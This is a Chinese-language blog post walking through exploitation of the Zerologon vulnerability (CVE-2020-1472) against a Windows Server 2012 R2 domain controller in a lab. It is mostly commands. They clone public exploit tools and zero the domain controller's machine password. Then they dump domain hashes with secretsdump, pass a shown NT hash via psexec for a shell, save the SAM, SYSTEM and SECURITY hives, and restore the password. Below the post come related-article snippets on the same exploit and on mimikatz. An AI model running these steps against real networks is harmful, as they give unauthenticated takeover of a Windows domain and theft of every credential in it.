看我拿下域控-cve2020-1472-Netlogon

最新推荐文章于 2024-11-30 08:58:04 发布
最新推荐文章于 2024-11-30 08:58:04 发布
阅读量742 收藏
点赞数
文章标签: 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43227251/article/details/115624329
版权

cve2020-1472

文章目录


这篇是原理篇下一篇说简单通过 mimikatz拿下域控

简介

2020年8月11号,微软修复了Netlogon 特权提升漏洞,当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

要利用此漏洞,未通过身份验证的攻击者需要将 MS-NRPC 连接到域控制器,以获取域管理员访问权限。而2020年9月15日,secura发布了漏洞细节,之后相关的EXP也就被构造出来,漏洞原理

Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

环境简介

DC

VERSION :Windows Server 2012 R2 Datacenter
HOSTNAME :WIN-H06K3JJM9AO
IP :192.168.18.20

Attack

IP:192.168.18.114

漏洞验证

我们可以使用如下命令进行漏洞验证

git clone https://github.com/SecuraBV/CVE-2020-1472
cd CVE-2020-1472\
pip install -r requirements.txt
python zerologon_tester.py '域控主机名' '域控ip'

在这里插入图片描述

success!

漏洞利用

思路

  • 置空域控保存在AD中的密码
  • 获取域控用户HASH
  • 通过获取到的管理员HASH得到一个SHELL,然后连接上去导出原来计算机中本地保存的HASH
  • 通过获取到的HASH恢复置空的域控密码

利用复现

环境配置

攻击机环境要求python版本再3.7以上,而且要获取最新版的Impacket,否则会产生如下报错报错(新版本中更新了我们利用中会用到的函数NetrServerPasswordSet2)

AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'
安装Impacket
git clone https://github.com/SecureAuthCorp/impacketcd 
cd impacket
pip install .
下载EXP
git clone https://github.com/dirkjanm/CVE-2020-1472

置空密码

python cve-2020-1472-exploit.py WIN-H06K3JJM9AO 192.168.18.20

在这里插入图片描述

获取HASH

接下来我们通过secretsdump.py根据DRS协议来获取相关的HASH,这里注意Windows用户在终端中的命令无需转义

python secretsdump.py abc.com/WIN-H06K3JJM9AO$@192.168.18.20 -no-pass

在这里插入图片描述

获取SHELL

获取到HASH之后pth

python psexec.py abc.com/Administrator@192.168.18.20 -hashes :afffeba176210fad4628f0524bfe1942   ----冒号不能少 “:”

在这里插入图片描述

获取原HASH

获取SHELL后我们执行以下命令,导出SAM中原来的HASH

get失败是因为本地没开共享

reg save hklm\sam sam.save
reg save hklm\system system.save
reg save hklm\security security.save

get sam.save
get system.save
get security.save

解HASH

执行如下命令,利用secretsdump.py && 猕猴桃(猕猴桃在下一篇讲攻击命令) 解析保存在本地的nt hash

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

然后我们保存上图中红框部分,即

75a5412d6016ca5c10c859425d2a13b1

恢复HASH

git clone https://github.com/risksense/zerologon

python reinstall_original_pw.py WIN-H06K3JJM9AO 192.168.18.20 75a5412d6016ca5c10c859425d2a13b1

在这里插入图片描述

检查是否恢复

我们这时候再用获取HASH时测试一下是否已经已经恢复

# windows
python secretsdump.py abc.com/WIN-H06K3JJM9AO$@192.168.18.20 -no-pass
# others
python secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

在这里插入图片描述

qin9.
关注
CVE-2020-1472渗透 NetLogon 权限提升漏洞
千寻的博客
06-13 487
模拟环境:获取了一个加入了的计算机权限,在system账号权限的情况下,将管密码置空,导出管hash,然后进行连接
CVE-2020-1472 内提权复现
文公子的博客
12-07 587
CVE-2020-1472 内提权复现 *漏洞介绍* 在今年9月份,国外披露了CVE-2020-1472(又被叫做ZeroLogon)的漏洞详情,网上也随即公开了Exp。是近几年windows上比较重量级别的一个漏洞。通过该漏洞,攻击者只需能够访问的445端口,在无需任何凭据的情况下能拿到管的权限。该漏洞的产生来源于Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭证的情况情况下通过认证。该漏洞的最稳定利用是调用netlogon中RPC函数NetrServerPasswordSet2
牛红红的日记(平平无奇拿下
Key_book(句芒安全实验室)
04-02 640
牛红红的日记(平平无奇拿下) 注:本文首发地址:https://www.sec-in.com 文章作者为-句芒安全实验室-成员之一,欢迎微信搜索关注我们。 一、引文 x年x月x日 晴 我是一只牛,家里的老大,我叫牛红红,我还有六个兄弟,分别是橙黄绿青蓝紫。后来我知道这名字是一个头上带着葫芦的算命的老头起的,长大后我问他为什么要起这个名字,老头说当年他爷爷被妖精抓走,于是他便怒气冲冲的去解救,上去便是一句:“妖精!还我爷爷!”没想到妖精和颜悦色的问了他一个问题,他一直苦苦思索,始终没有结果,说着便给我看了
CVE-2020-1472复现(包含Win Server 2012环境搭建)
Zyecho的博客
10-21 1371
CVE-2020-1472复现(包含Win Server 2012环境搭建),详细记录了CVE-2020-1472复现,将中保存在AD中的管理员password设置为空。
[内网渗透]—NetLogon 内提权漏洞(CVE-2020-1472)
Sentiment的博客
12-16 721
CVE-2020-1472 是⼀个 windows 中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与间易受攻击的安全通道时,可利⽤此漏洞获取管访问权限(将中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。获取了一个加入了的计算机权限,在普通账号的情况下,将管密码置空,导出管hash,然后进行连接。
.NET 软件开发练习题
weixin_30420305的博客
09-15 358
.NET 软件开发练习题 1.您需要创建一个 ASP.NET 应用程序,公司考虑使用 Windows 身份认证。 所有的用户都存在于 AllWin 这个中。您想要使用下列认证规则来配置这个应用程序: a、 匿名用户不允许访问这个应用程序。 b、 所有雇员除了 Tess 和 King 都允许访问这个应用程序。 请问您应该使用以下哪一个代码段来配置这个应用程序?( A ) A. &l...
Netlogon特权提升漏洞 (CVE-2020-1472)
总有人间一两风,填我十万八千梦
03-18 4980
2020年8月份微软发布的安全公告中,有一个十分紧急的漏洞——CVE-2020-1472 NetLogon 权限提升漏洞。通过该漏洞,未经身份验证的攻击者只需要能访问的135端口即可通过 NetLogon 远程协议连接并重置机器的Hash,从而导致攻击者可以利用的机器账户导出内所有用户的Hash(的机器账户默认具有DCSync权限)。该漏洞存在的原因是Netlogon协议中加密模块存在问题,导致攻击者能够在没有有效凭据的情况下通过身份认证。
Ladon插件-CVE-2020-1472提权漏洞EXP
K8哥哥
09-16 1360
漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与间易受攻击的安全通道时,可利用此漏洞获取管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pac
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-1472 Netlogon特权提升漏洞分析及复现
include_voidmain的博客
03-03 7264
0x01漏洞背景 NetLogon远程协议是一种在Windows 上使用的RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新计算机密码。 微软MSRC于8月11日发布了Netlogon 特权提升漏洞安全通告。此漏洞CVE编号CVE-2020-1472,CVSS评分:10.0。由Secura公司的Tom Tervoort发现提交并命名为ZeroLogon。 0x02漏洞分析 Netlogon协议使用的是自定义的加密协议来让客户端(加
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
内常见CVE Exploit
qq_18811919的博客
03-18 1339
本篇文章讲述了近些年来一些常见的CVE利用 1.CVE-2021-42287(saMAccountName spoofing利用) 2.Windows Print Spooler漏洞 3.CVE-2020-1472 NetLogon机器账户重置密码为空) 4.MS14-068权限提升 5.CVE-2019-1040 NTLM MIC绕过
什么是netlogon (摘要)
cuiqi1238的博客
08-01 824
网络登录 “网络登录”系统服务维护计算机和制器之间的安全通道,对用户和服务进行身份验证。它将用户的凭据传递给制器,然后返回用户的安全标识符和用户权限。这通常称为 pass-through 身份验证。“网络登录”被配置为...
Windows常见0day及利用漏洞汇集
Ms08067安全实验室
01-10 3347
本文对近几年出现的Windows相关漏洞及利用方法进行整理,方便检测存在的漏洞,目前来看主要集中在本地权限提升、打印机服务利用、exchange等。 1.1Kerberos 校验和漏洞MS14-068(CVE-2014-6324) Microsoft Windows Server 2003 SP2、Windows Vista SP2、Windows Server 2008...
权限提升漏洞之Netlogon协议详解 以及可能出现得漏洞分析
最新发布
浩策盾悟
11-30 1万+
1.Netlogon服务1Netlogon它被,最常见的是。2.Netlogon服务2Netlogon它被,最常见的是。该服务的可执行文件路径为C:\Windows\system32\lsass.exe3.Netlogon认证流程1NeglogonMS-NRPC并没有使用与。在进行正式通信之前,该值用于保护双方后续的RPC通信流量。该服务的可执行文件路径为C:\Windows\system32\lsass.exe4.Netlogon认证流程2NeglogonMS-NRPC并没有使用与。
Windows 共享文件 netlogon和sysvol的作用
weixin_42494218的博客
02-03 1380
Windows 共享文件 netlogon和sysvol的作用
mimikatz常用命令总结
热门推荐
Shanfenglan's blog
08-27 24万+
前言 在管理员权限下使用,如果没有管理员权限,基本每个功能都无法正常使用,切记。 命令 普通管理员权限可以执行的命令(密码查询与权限检测与日志记录) lsadump::lsa /inject 可以查看所有用户的所有详细信息 privilege::debug 打开第一个命令,且必须执行。 log 将这条命令执行后的所谓有输出存在当前目录下的mimikatz.log文件中。 sekurlsa::logonpasswords 列出已登陆用户的密码(比较常用) 权限才能执行的命令 lsadump::dc
漏洞-CVE-2021-42287&42278复现
君行路的博客
12-16 1万+
文章目录环境介绍sam-the-admin python利用脚本noPac利用脚本利用流程1. 查询MAQ值2. 普通用户创建机器账户并清除SPN3. 重设机器名称4. 为机器账户请求TGT5. 再次更改机器账户的sAMAccountName6. 通过S4U2self协议向DC请求TGS票据参考链接 微信公众号:信安文摘 环境介绍 :god.org windows 7 192.168.52.143 机器名称:stu1 内普通用户:liukaifeng01:hongrisec@2021@ wind
CVE-2020-1472(内提权)
p01son的博客
08-02 775
CVE-2020-1472(内提权) Created: July 7, 2021 5:25 PM 文章目录CVE-2020-1472(内提权)简介影响范围复现环境复现过程恢复原机器hash参考 简介 CVE-2020-1472是一个windows中严重的远程权限提升漏洞,是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值